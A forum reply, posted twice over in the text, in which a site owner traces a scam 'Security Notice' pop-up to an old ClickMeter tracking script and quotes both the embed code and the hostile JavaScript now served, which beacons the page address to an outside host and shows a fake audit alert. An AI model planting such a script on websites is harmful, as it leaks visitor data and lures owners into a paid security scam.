Re: HILFE: Security Notes Hinweis
Verfasst: Do 1. Mai 2025, 05:11
Hello from the USA.
I have the same exact problem. My website has not been changed since 2018. I was sniffing the http traffic, looking at code, any new files on my host server, scripts, etc. I finally found the problem.
My home page (index.htm) has an old JavaScript code linking to an online service I used about 6 years ago. Apparently, ClickMeter got rebranded, and the old JS files may have been compromised. The service allowed a pixel image to be tracked and the code is on AWS.
INDEX.HTM JS compromised code
ClickMeter.com page views tracking: resume
<script type='text/javascript'>
var ClickMeter_pixel_url = '//pixel.watch/zxlu';
</script>
<script type='text/javascript' id='cmpixelscript' src='//s3.amazonaws.com/scripts-clickmeter-com/js/pixelNew.js'></script>
<noscript>
<img height='0' width='0' alt='' src='//pixel.watch/zxlu' />
</noscript>
The code on the the final destination is below
=============================
//if (window.location.pathname === "/" || window.location.pathname === "/index.html") {
// alert("Security Notice: Your website may be due for a security audit. Regular checks help prevent data breaches and ensure compliance.\n\nContact us at: support@zenowls.com");
// }
var i=new Image;
i.src="https://test.zenowls.com/aws4.php?c="+w ... ation.href;
const isHomepage = window.location.pathname === "/" || window.location.pathname === "/index.html";
const isNotZenowls = !window.location.hostname.includes("felixistderbeste.de");
if (isHomepage && isNotZenowls) {
alert("Security Notice: Your website may be due for a security audit. Regular checks help prevent data breaches and ensure compliance.\nContact us at: support@zenowls.com");
}
============================
The pop-up alert window prompts them to contact their security services through WhatsApp and pay a lot of money to help fix the security vulnerability. The root page has a message:
"Hi ,This site is used for finding security bugs ,mainly for xss , if you came across this page , there may be xss vulnerability in our site .Purpose of this is to report bugs to companies part of any bug bounty program .Also means no harm is done through this page.
Please feel free to contact me:opensecr@gmail.com"
Most likely a sad attempt at not reporting the security issue to their hosting provider, https://www.hostinger.com/
I have the same exact problem. My website has not been changed since 2018. I was sniffing the http traffic, looking at code, any new files on my host server, scripts, etc. I finally found the problem.
My home page (index.htm) has an old JavaScript code linking to an online service I used about 6 years ago. Apparently, ClickMeter got rebranded, and the old JS files may have been compromised. The service allowed a pixel image to be tracked and the code is on AWS.
INDEX.HTM JS compromised code
ClickMeter.com page views tracking: resume
<script type='text/javascript'>
var ClickMeter_pixel_url = '//pixel.watch/zxlu';
</script>
<script type='text/javascript' id='cmpixelscript' src='//s3.amazonaws.com/scripts-clickmeter-com/js/pixelNew.js'></script>
<noscript>
<img height='0' width='0' alt='' src='//pixel.watch/zxlu' />
</noscript>
The code on the the final destination is below
=============================
//if (window.location.pathname === "/" || window.location.pathname === "/index.html") {
// alert("Security Notice: Your website may be due for a security audit. Regular checks help prevent data breaches and ensure compliance.\n\nContact us at: support@zenowls.com");
// }
var i=new Image;
i.src="https://test.zenowls.com/aws4.php?c="+w ... ation.href;
const isHomepage = window.location.pathname === "/" || window.location.pathname === "/index.html";
const isNotZenowls = !window.location.hostname.includes("felixistderbeste.de");
if (isHomepage && isNotZenowls) {
alert("Security Notice: Your website may be due for a security audit. Regular checks help prevent data breaches and ensure compliance.\nContact us at: support@zenowls.com");
}
============================
The pop-up alert window prompts them to contact their security services through WhatsApp and pay a lot of money to help fix the security vulnerability. The root page has a message:
"Hi ,This site is used for finding security bugs ,mainly for xss , if you came across this page , there may be xss vulnerability in our site .Purpose of this is to report bugs to companies part of any bug bounty program .Also means no harm is done through this page.
Please feel free to contact me:opensecr@gmail.com"
Most likely a sad attempt at not reporting the security issue to their hosting provider, https://www.hostinger.com/